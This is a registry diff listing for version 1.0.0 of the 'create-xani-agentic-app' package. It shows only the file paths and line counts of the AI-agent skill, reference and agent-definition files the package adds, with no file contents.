create-xani-agentic-app 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +237 -0
- package/index.js +219 -0
- package/package.json +46 -0
- package/template/.agents/skills/ai-sdk/SKILL.md +78 -0
- package/template/.agents/skills/ai-sdk/references/ai-gateway.md +66 -0
- package/template/.agents/skills/ai-sdk/references/common-errors.md +443 -0
- package/template/.agents/skills/ai-sdk/references/devtools.md +52 -0
- package/template/.agents/skills/ai-sdk/references/type-safe-agents.md +204 -0
- package/template/.agents/skills/better-auth-best-practices/SKILL.md +175 -0
- package/template/.agents/skills/checkpoint/SKILL.md +82 -0
- package/template/.agents/skills/create-spec/SKILL.md +132 -0
- package/template/.agents/skills/create-spec/references/action-required-template.md +53 -0
- package/template/.agents/skills/create-spec/references/readme-template.md +53 -0
- package/template/.agents/skills/create-spec/references/requirements-template.md +54 -0
- package/template/.agents/skills/create-spec/references/task-template.md +79 -0
- package/template/.agents/skills/find-skills/SKILL.md +142 -0
- package/template/.agents/skills/frontend-design/LICENSE.txt +177 -0
- package/template/.agents/skills/frontend-design/SKILL.md +42 -0
- package/template/.agents/skills/implement-feature/SKILL.md +189 -0
- package/template/.agents/skills/implement-feature/references/coder-prompt-template.md +46 -0
- package/template/.agents/skills/implement-feature/references/fix-prompt-template.md +38 -0
- package/template/.agents/skills/implement-feature/references/review-prompt-template.md +50 -0
- package/template/.agents/skills/mcp-builder/LICENSE.txt +202 -0
- package/template/.agents/skills/mcp-builder/SKILL.md +236 -0
- package/template/.agents/skills/mcp-builder/reference/evaluation.md +602 -0
- package/template/.agents/skills/mcp-builder/reference/mcp_best_practices.md +249 -0
- package/template/.agents/skills/mcp-builder/reference/node_mcp_server.md +970 -0
- package/template/.agents/skills/mcp-builder/reference/python_mcp_server.md +719 -0
- package/template/.agents/skills/mcp-builder/scripts/connections.py +151 -0
- package/template/.agents/skills/mcp-builder/scripts/evaluation.py +373 -0
- package/template/.agents/skills/mcp-builder/scripts/example_evaluation.xml +22 -0
- package/template/.agents/skills/mcp-builder/scripts/requirements.txt +2 -0
- package/template/.agents/skills/nextjs/SKILL.md +434 -0
- package/template/.agents/skills/nextjs/overlay.yaml +284 -0
- package/template/.agents/skills/nextjs/references/app-router-files.md +94 -0
- package/template/.agents/skills/nextjs/references/async-patterns.md +87 -0
- package/template/.agents/skills/nextjs/references/bundling.md +180 -0
- package/template/.agents/skills/nextjs/references/data-patterns.md +297 -0
- package/template/.agents/skills/nextjs/references/debug-tricks.md +105 -0
- package/template/.agents/skills/nextjs/references/directives.md +73 -0
- package/template/.agents/skills/nextjs/references/error-handling.md +227 -0
- package/template/.agents/skills/nextjs/references/file-conventions.md +140 -0
- package/template/.agents/skills/nextjs/references/font.md +245 -0
- package/template/.agents/skills/nextjs/references/functions.md +108 -0
- package/template/.agents/skills/nextjs/references/hydration-error.md +91 -0
- package/template/.agents/skills/nextjs/references/image.md +173 -0
- package/template/.agents/skills/nextjs/references/metadata.md +301 -0
- package/template/.agents/skills/nextjs/references/parallel-routes.md +287 -0
- package/template/.agents/skills/nextjs/references/route-handlers.md +146 -0
- package/template/.agents/skills/nextjs/references/rsc-boundaries.md +159 -0
- package/template/.agents/skills/nextjs/references/runtime-selection.md +39 -0
- package/template/.agents/skills/nextjs/references/scripts.md +141 -0
- package/template/.agents/skills/nextjs/references/self-hosting.md +371 -0
- package/template/.agents/skills/nextjs/references/suspense-boundaries.md +67 -0
- package/template/.agents/skills/nextjs/upstream/SKILL.md +153 -0
- package/template/.agents/skills/nextjs/upstream/references/app-router-files.md +94 -0
- package/template/.agents/skills/nextjs/upstream/references/async-patterns.md +87 -0
- package/template/.agents/skills/nextjs/upstream/references/bundling.md +180 -0
- package/template/.agents/skills/nextjs/upstream/references/data-patterns.md +297 -0
- package/template/.agents/skills/nextjs/upstream/references/debug-tricks.md +105 -0
- package/template/.agents/skills/nextjs/upstream/references/directives.md +73 -0
- package/template/.agents/skills/nextjs/upstream/references/error-handling.md +227 -0
- package/template/.agents/skills/nextjs/upstream/references/file-conventions.md +140 -0
- package/template/.agents/skills/nextjs/upstream/references/font.md +245 -0
- package/template/.agents/skills/nextjs/upstream/references/functions.md +108 -0
- package/template/.agents/skills/nextjs/upstream/references/hydration-error.md +91 -0
- package/template/.agents/skills/nextjs/upstream/references/image.md +173 -0
- package/template/.agents/skills/nextjs/upstream/references/metadata.md +301 -0
- package/template/.agents/skills/nextjs/upstream/references/parallel-routes.md +287 -0
- package/template/.agents/skills/nextjs/upstream/references/route-handlers.md +146 -0
- package/template/.agents/skills/nextjs/upstream/references/rsc-boundaries.md +159 -0
- package/template/.agents/skills/nextjs/upstream/references/runtime-selection.md +39 -0
- package/template/.agents/skills/nextjs/upstream/references/scripts.md +141 -0
- package/template/.agents/skills/nextjs/upstream/references/self-hosting.md +371 -0
- package/template/.agents/skills/nextjs/upstream/references/suspense-boundaries.md +67 -0
- package/template/.agents/skills/playwright-cli/SKILL.md +344 -0
- package/template/.agents/skills/playwright-cli/references/element-attributes.md +23 -0
- package/template/.agents/skills/playwright-cli/references/playwright-tests.md +39 -0
- package/template/.agents/skills/playwright-cli/references/request-mocking.md +87 -0
- package/template/.agents/skills/playwright-cli/references/running-code.md +231 -0
- package/template/.agents/skills/playwright-cli/references/session-management.md +169 -0
- package/template/.agents/skills/playwright-cli/references/storage-state.md +275 -0
- package/template/.agents/skills/playwright-cli/references/test-generation.md +88 -0
- package/template/.agents/skills/playwright-cli/references/tracing.md +139 -0
- package/template/.agents/skills/playwright-cli/references/video-recording.md +143 -0
- package/template/.agents/skills/review-pr/SKILL.md +97 -0
- package/template/.agents/skills/security-scanner/SKILL.md +157 -0
- package/template/.agents/skills/security-scanner/references/A01-broken-access-control.md +136 -0
- package/template/.agents/skills/security-scanner/references/A02-security-misconfiguration.md +130 -0
- package/template/.agents/skills/security-scanner/references/A03-software-supply-chain-failures.md +117 -0
- package/template/.agents/skills/security-scanner/references/A04-cryptographic-failures.md +141 -0
- package/template/.agents/skills/security-scanner/references/A05-injection.md +155 -0
- package/template/.agents/skills/security-scanner/references/A06-insecure-design.md +145 -0
- package/template/.agents/skills/security-scanner/references/A07-authentication-failures.md +150 -0
- package/template/.agents/skills/security-scanner/references/A08-software-data-integrity-failures.md +132 -0
- package/template/.agents/skills/security-scanner/references/A09-security-logging-alerting-failures.md +130 -0
- package/template/.agents/skills/security-scanner/references/A10-mishandling-exceptional-conditions.md +154 -0
- package/template/.agents/skills/security-scanner/references/report-template.md +148 -0
- package/template/.agents/skills/shadcn/SKILL.md +246 -0
- package/template/.agents/skills/shadcn/agents/openai.yml +5 -0
- package/template/.agents/skills/shadcn/assets/shadcn-small.png +0 -0
- package/template/.agents/skills/shadcn/assets/shadcn.png +0 -0
- package/template/.agents/skills/shadcn/cli.md +276 -0
- package/template/.agents/skills/shadcn/customization.md +209 -0
- package/template/.agents/skills/shadcn/evals/evals.json +47 -0
- package/template/.agents/skills/shadcn/mcp.md +94 -0
- package/template/.agents/skills/shadcn/rules/base-vs-radix.md +306 -0
- package/template/.agents/skills/shadcn/rules/composition.md +195 -0
- package/template/.agents/skills/shadcn/rules/forms.md +192 -0
- package/template/.agents/skills/shadcn/rules/icons.md +101 -0
- package/template/.agents/skills/shadcn/rules/styling.md +162 -0
- package/template/.agents/skills/ship-it/SKILL.md +174 -0
- package/template/.agents/skills/skill-creator/LICENSE.txt +202 -0
- package/template/.agents/skills/skill-creator/SKILL.md +485 -0
- package/template/.agents/skills/skill-creator/agents/analyzer.md +274 -0
- package/template/.agents/skills/skill-creator/agents/comparator.md +202 -0
- package/template/.agents/skills/skill-creator/agents/grader.md +223 -0
- package/template/.agents/skills/skill-creator/assets/eval_review.html +146 -0
- package/template/.agents/skills/skill-creator/eval-viewer/generate_review.py +471 -0
- package/template/.agents/skills/skill-creator/eval-viewer/viewer.html +1325 -0
- package/template/.agents/skills/skill-creator/references/schemas.md +430 -0
- package/template/.agents/skills/skill-creator/scripts/__init__.py +0 -0
- package/template/.agents/skills/skill-creator/scripts/aggregate_benchmark.py +401 -0
- package/template/.agents/skills/skill-creator/scripts/generate_report.py +326 -0
- package/template/.agents/skills/skill-creator/scripts/improve_description.py +247 -0
- package/template/.agents/skills/skill-creator/scripts/package_skill.py +136 -0
- package/template/.agents/skills/skill-creator/scripts/quick_validate.py +103 -0
- package/template/.agents/skills/skill-creator/scripts/run_eval.py +310 -0
- package/template/.agents/skills/skill-creator/scripts/run_loop.py +328 -0
- package/template/.agents/skills/skill-creator/scripts/utils.py +47 -0
- package/template/.agents/skills/vercel-react-best-practices/AGENTS.md +3750 -0
- package/template/.agents/skills/vercel-react-best-practices/README.md +123 -0
- package/template/.agents/skills/vercel-react-best-practices/SKILL.md +148 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/_sections.md +46 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/_template.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-effect-event-deps.md +56 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-event-handler-refs.md +55 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-init-once.md +42 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/advanced-use-latest.md +39 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-api-routes.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-cheap-condition-before-await.md +37 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-defer-await.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-dependencies.md +51 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-parallel.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/async-suspense-boundaries.md +99 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-barrel-imports.md +60 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-conditional.md +31 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-defer-third-party.md +49 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-dynamic-imports.md +35 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/bundle-preload.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-event-listeners.md +74 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-localstorage-schema.md +71 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-passive-event-listeners.md +48 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/client-swr-dedup.md +56 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-batch-dom-css.md +107 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-function-results.md +80 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-property-access.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-cache-storage.md +70 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-combine-iterations.md +32 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-early-exit.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-flatmap-filter.md +60 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-hoist-regexp.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-index-maps.md +37 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-length-check-first.md +49 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-min-max-loop.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-request-idle-callback.md +105 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-set-map-lookups.md +24 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/js-tosorted-immutable.md +57 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-activity.md +26 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-animate-svg-wrapper.md +47 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-conditional-render.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-content-visibility.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hoist-jsx.md +46 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hydration-no-flicker.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-hydration-suppress-warning.md +30 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-resource-hints.md +85 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-script-defer-async.md +68 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-svg-precision.md +28 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rendering-usetransition-loading.md +75 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-defer-reads.md +39 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-dependencies.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-derived-state-no-effect.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-derived-state.md +29 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-functional-setstate.md +74 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-lazy-state-init.md +58 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-memo-with-default-value.md +38 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-memo.md +44 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-move-effect-to-event.md +45 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-no-inline-components.md +82 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-simple-expression-in-memo.md +35 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-split-combined-hooks.md +64 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-transitions.md +40 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-use-deferred-value.md +59 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/rerender-use-ref-transient-values.md +73 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-after-nonblocking.md +73 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-auth-actions.md +96 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-cache-lru.md +41 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-cache-react.md +76 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-dedup-props.md +65 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-hoist-static-io.md +149 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-no-shared-module-state.md +50 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-parallel-fetching.md +83 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-parallel-nested-fetching.md +34 -0
- package/template/.agents/skills/vercel-react-best-practices/rules/server-serialization.md +38 -0
- package/template/.agents/skills/web-design-guidelines/SKILL.md +39 -0
- package/template/.claude/agents/better-auth-expert.md +189 -0
- package/template/.claude/agents/code-review.md +147 -0
- package/template/.claude/agents/coder.md +139 -0
- package/template/.claude/agents/deep-dive.md +133 -0
- package/template/.claude/agents/polar-payments-expert.md +140 -0
- package/template/.claude/agents/security-scanner.md +214 -0
- package/template/.claude/settings.local.json +15 -0
- package/template/.claude/skills/ai-sdk/SKILL.md +78 -0
- package/template/.claude/skills/ai-sdk/references/ai-gateway.md +66 -0
- package/template/.claude/skills/ai-sdk/references/common-errors.md +443 -0
- package/template/.claude/skills/ai-sdk/references/devtools.md +52 -0
- package/template/.claude/skills/ai-sdk/references/type-safe-agents.md +204 -0
- package/template/.claude/skills/better-auth-best-practices/SKILL.md +175 -0
- package/template/.claude/skills/caveman/SKILL.md +49 -0
- package/template/.claude/skills/checkpoint/SKILL.md +82 -0
- package/template/.claude/skills/create-spec/SKILL.md +132 -0
- package/template/.claude/skills/create-spec/references/action-required-template.md +53 -0
- package/template/.claude/skills/create-spec/references/readme-template.md +53 -0
- package/template/.claude/skills/create-spec/references/requirements-template.md +54 -0
- package/template/.claude/skills/create-spec/references/task-template.md +79 -0
- package/template/.claude/skills/d3-visualization/SKILL.md +62 -0
- package/template/.claude/skills/find-skills/SKILL.md +142 -0
- package/template/.claude/skills/frontend-design/LICENSE.txt +177 -0
- package/template/.claude/skills/frontend-design/SKILL.md +42 -0
- package/template/.claude/skills/grill-me/SKILL.md +10 -0
- package/template/.claude/skills/grill-with-docs/ADR-FORMAT.md +47 -0
- package/template/.claude/skills/grill-with-docs/CONTEXT-FORMAT.md +63 -0
- package/template/.claude/skills/grill-with-docs/SKILL.md +88 -0
- package/template/.claude/skills/gsap-core/SKILL.md +267 -0
- package/template/.claude/skills/implement-feature/SKILL.md +189 -0
- package/template/.claude/skills/implement-feature/references/coder-prompt-template.md +46 -0
- package/template/.claude/skills/implement-feature/references/fix-prompt-template.md +38 -0
- package/template/.claude/skills/implement-feature/references/review-prompt-template.md +50 -0
- package/template/.claude/skills/mcp-builder/LICENSE.txt +202 -0
- package/template/.claude/skills/mcp-builder/SKILL.md +236 -0
- package/template/.claude/skills/mcp-builder/reference/evaluation.md +602 -0
- package/template/.claude/skills/mcp-builder/reference/mcp_best_practices.md +249 -0
- package/template/.claude/skills/mcp-builder/reference/node_mcp_server.md +970 -0
- package/template/.claude/skills/mcp-builder/reference/python_mcp_server.md +719 -0
- package/template/.claude/skills/mcp-builder/scripts/connections.py +151 -0
- package/template/.claude/skills/mcp-builder/scripts/evaluation.py +373 -0
- package/template/.claude/skills/mcp-builder/scripts/example_evaluation.xml +22 -0
- package/template/.claude/skills/mcp-builder/scripts/requirements.txt +2 -0
- package/template/.claude/skills/nextjs/SKILL.md +434 -0
- package/template/.claude/skills/nextjs/overlay.yaml +284 -0
- package/template/.claude/skills/nextjs/references/app-router-files.md +94 -0
- package/template/.claude/skills/nextjs/references/async-patterns.md +87 -0
- package/template/.claude/skills/nextjs/references/bundling.md +180 -0
- package/template/.claude/skills/nextjs/references/data-patterns.md +297 -0
- package/template/.claude/skills/nextjs/references/debug-tricks.md +105 -0
- package/template/.claude/skills/nextjs/references/directives.md +73 -0
- package/template/.claude/skills/nextjs/references/error-handling.md +227 -0
- package/template/.claude/skills/nextjs/references/file-conventions.md +140 -0
- package/template/.claude/skills/nextjs/references/font.md +245 -0
- package/template/.claude/skills/nextjs/references/functions.md +108 -0
- package/template/.claude/skills/nextjs/references/hydration-error.md +91 -0
- package/template/.claude/skills/nextjs/references/image.md +173 -0
- package/template/.claude/skills/nextjs/references/metadata.md +301 -0
- package/template/.claude/skills/nextjs/references/parallel-routes.md +287 -0
- package/template/.claude/skills/nextjs/references/route-handlers.md +146 -0
- package/template/.claude/skills/nextjs/references/rsc-boundaries.md +159 -0
- package/template/.claude/skills/nextjs/references/runtime-selection.md +39 -0
- package/template/.claude/skills/nextjs/references/scripts.md +141 -0
- package/template/.claude/skills/nextjs/references/self-hosting.md +371 -0
- package/template/.claude/skills/nextjs/references/suspense-boundaries.md +67 -0
- package/template/.claude/skills/nextjs/upstream/SKILL.md +153 -0
- package/template/.claude/skills/nextjs/upstream/references/app-router-files.md +94 -0
- package/template/.claude/skills/nextjs/upstream/references/async-patterns.md +87 -0
- package/template/.claude/skills/nextjs/upstream/references/bundling.md +180 -0
- package/template/.claude/skills/nextjs/upstream/references/data-patterns.md +297 -0
- package/template/.claude/skills/nextjs/upstream/references/debug-tricks.md +105 -0
- package/template/.claude/skills/nextjs/upstream/references/directives.md +73 -0
- package/template/.claude/skills/nextjs/upstream/references/error-handling.md +227 -0
- package/template/.claude/skills/nextjs/upstream/references/file-conventions.md +140 -0
- package/template/.claude/skills/nextjs/upstream/references/font.md +245 -0
- package/template/.claude/skills/nextjs/upstream/references/functions.md +108 -0
- package/template/.claude/skills/nextjs/upstream/references/hydration-error.md +91 -0
- package/template/.claude/skills/nextjs/upstream/references/image.md +173 -0
- package/template/.claude/skills/nextjs/upstream/references/metadata.md +301 -0
- package/template/.claude/skills/nextjs/upstream/references/parallel-routes.md +287 -0
- package/template/.claude/skills/nextjs/upstream/references/route-handlers.md +146 -0
- package/template/.claude/skills/nextjs/upstream/references/rsc-boundaries.md +159 -0
- package/template/.claude/skills/nextjs/upstream/references/runtime-selection.md +39 -0
- package/template/.claude/skills/nextjs/upstream/references/scripts.md +141 -0
- package/template/.claude/skills/nextjs/upstream/references/self-hosting.md +371 -0
- package/template/.claude/skills/nextjs/upstream/references/suspense-boundaries.md +67 -0
- package/template/.claude/skills/playwright-cli/SKILL.md +344 -0
- package/template/.claude/skills/playwright-cli/references/element-attributes.md +23 -0
- package/template/.claude/skills/playwright-cli/references/playwright-tests.md +39 -0
- package/template/.claude/skills/playwright-cli/references/request-mocking.md +87 -0
- package/template/.claude/skills/playwright-cli/references/running-code.md +231 -0
- package/template/.claude/skills/playwright-cli/references/session-management.md +169 -0
- package/template/.claude/skills/playwright-cli/references/storage-state.md +275 -0
- package/template/.claude/skills/playwright-cli/references/test-generation.md +88 -0
- package/template/.claude/skills/playwright-cli/references/tracing.md +139 -0
- package/template/.claude/skills/playwright-cli/references/video-recording.md +143 -0
- package/template/.claude/skills/react-three-fiber/SKILL.md +180 -0
- package/template/.claude/skills/remotion/SKILL.md +43 -0
- package/template/.claude/skills/review-pr/SKILL.md +97 -0
- package/template/.claude/skills/security-scanner/SKILL.md +157 -0
- package/template/.claude/skills/security-scanner/references/A01-broken-access-control.md +136 -0
- package/template/.claude/skills/security-scanner/references/A02-security-misconfiguration.md +130 -0
- package/template/.claude/skills/security-scanner/references/A03-software-supply-chain-failures.md +117 -0
- package/template/.claude/skills/security-scanner/references/A04-cryptographic-failures.md +141 -0
- package/template/.claude/skills/security-scanner/references/A05-injection.md +155 -0
- package/template/.claude/skills/security-scanner/references/A06-insecure-design.md +145 -0
- package/template/.claude/skills/security-scanner/references/A07-authentication-failures.md +150 -0
- package/template/.claude/skills/security-scanner/references/A08-software-data-integrity-failures.md +132 -0
- package/template/.claude/skills/security-scanner/references/A09-security-logging-alerting-failures.md +130 -0
- package/template/.claude/skills/security-scanner/references/A10-mishandling-exceptional-conditions.md +154 -0
- package/template/.claude/skills/security-scanner/references/report-template.md +148 -0
- package/template/.claude/skills/shadcn/SKILL.md +246 -0
- package/template/.claude/skills/shadcn/agents/openai.yml +5 -0
- package/template/.claude/skills/shadcn/assets/shadcn-small.png +0 -0
- package/template/.claude/skills/shadcn/assets/shadcn.png +0 -0
- package/template/.claude/skills/shadcn/cli.md +276 -0
- package/template/.claude/skills/shadcn/customization.md +209 -0
- package/template/.claude/skills/shadcn/evals/evals.json +47 -0
- package/template/.claude/skills/shadcn/mcp.md +94 -0
- package/template/.claude/skills/shadcn/rules/base-vs-radix.md +306 -0
- package/template/.claude/skills/shadcn/rules/composition.md +195 -0
- package/template/.claude/skills/shadcn/rules/forms.md +192 -0
- package/template/.claude/skills/shadcn/rules/icons.md +101 -0
- package/template/.claude/skills/shadcn/rules/styling.md +162 -0
- package/template/.claude/skills/ship-it/SKILL.md +174 -0
- package/template/.claude/skills/skill-creator/LICENSE.txt +202 -0
- package/template/.claude/skills/skill-creator/SKILL.md +485 -0
- package/template/.claude/skills/skill-creator/agents/analyzer.md +274 -0
- package/template/.claude/skills/skill-creator/agents/comparator.md +202 -0
- package/template/.claude/skills/skill-creator/agents/grader.md +223 -0
- package/template/.claude/skills/skill-creator/assets/eval_review.html +146 -0
- package/template/.claude/skills/skill-creator/eval-viewer/generate_review.py +471 -0
- package/template/.claude/skills/skill-creator/eval-viewer/viewer.html +1325 -0
- package/template/.claude/skills/skill-creator/references/schemas.md +430 -0
- package/template/.claude/skills/skill-creator/scripts/__init__.py +0 -0
- package/template/.claude/skills/skill-creator/scripts/aggregate_benchmark.py +401 -0
- package/template/.claude/skills/skill-creator/scripts/generate_report.py +326 -0
- package/template/.claude/skills/skill-creator/scripts/improve_description.py +247 -0
- package/template/.claude/skills/skill-creator/scripts/package_skill.py +136 -0
- package/template/.claude/skills/skill-creator/scripts/quick_validate.py +103 -0
- package/template/.claude/skills/skill-creator/scripts/run_eval.py +310 -0
- package/template/.claude/skills/skill-creator/scripts/run_loop.py +328 -0
- package/template/.claude/skills/skill-creator/scripts/utils.py +47 -0
- package/template/.claude/skills/svelte/SKILL.md +284 -0
- package/template/.claude/skills/tdd/SKILL.md +109 -0
- package/template/.claude/skills/tdd/deep-modules.md +33 -0
- package/template/.claude/skills/tdd/interface-design.md +31 -0
- package/template/.claude/skills/tdd/mocking.md +59 -0
- package/template/.claude/skills/tdd/refactoring.md +10 -0
- package/template/.claude/skills/tdd/tests.md +61 -0
- package/template/.claude/skills/threejs/SKILL.md +43 -0
- package/template/.claude/skills/to-issues/SKILL.md +83 -0
- package/template/.claude/skills/to-prd/SKILL.md +76 -0
- package/template/.claude/skills/vercel-react-best-practices/AGENTS.md +3750 -0
- package/template/.claude/skills/vercel-react-best-practices/README.md +123 -0
- package/template/.claude/skills/vercel-react-best-practices/SKILL.md +148 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/_sections.md +46 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/_template.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-effect-event-deps.md +56 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-event-handler-refs.md +55 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-init-once.md +42 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/advanced-use-latest.md +39 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-api-routes.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-cheap-condition-before-await.md +37 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-defer-await.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-dependencies.md +51 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-parallel.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/async-suspense-boundaries.md +99 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-barrel-imports.md +60 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-conditional.md +31 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-defer-third-party.md +49 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-dynamic-imports.md +35 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/bundle-preload.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-event-listeners.md +74 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-localstorage-schema.md +71 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-passive-event-listeners.md +48 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/client-swr-dedup.md +56 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-batch-dom-css.md +107 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-function-results.md +80 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-property-access.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-cache-storage.md +70 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-combine-iterations.md +32 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-early-exit.md +50 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-flatmap-filter.md +60 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-hoist-regexp.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-index-maps.md +37 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-length-check-first.md +49 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-min-max-loop.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-request-idle-callback.md +105 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-set-map-lookups.md +24 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/js-tosorted-immutable.md +57 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-activity.md +26 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-animate-svg-wrapper.md +47 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-conditional-render.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-content-visibility.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hoist-jsx.md +46 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hydration-no-flicker.md +82 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-hydration-suppress-warning.md +30 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-resource-hints.md +85 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-script-defer-async.md +68 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-svg-precision.md +28 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rendering-usetransition-loading.md +75 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-defer-reads.md +39 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-dependencies.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-derived-state-no-effect.md +40 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-derived-state.md +29 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-functional-setstate.md +74 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-lazy-state-init.md +58 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-memo-with-default-value.md +38 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-memo.md +44 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-move-effect-to-event.md +45 -0
- package/template/.claude/skills/vercel-react-best-practices/rules/rerender-no-inline-components.md +82 -0
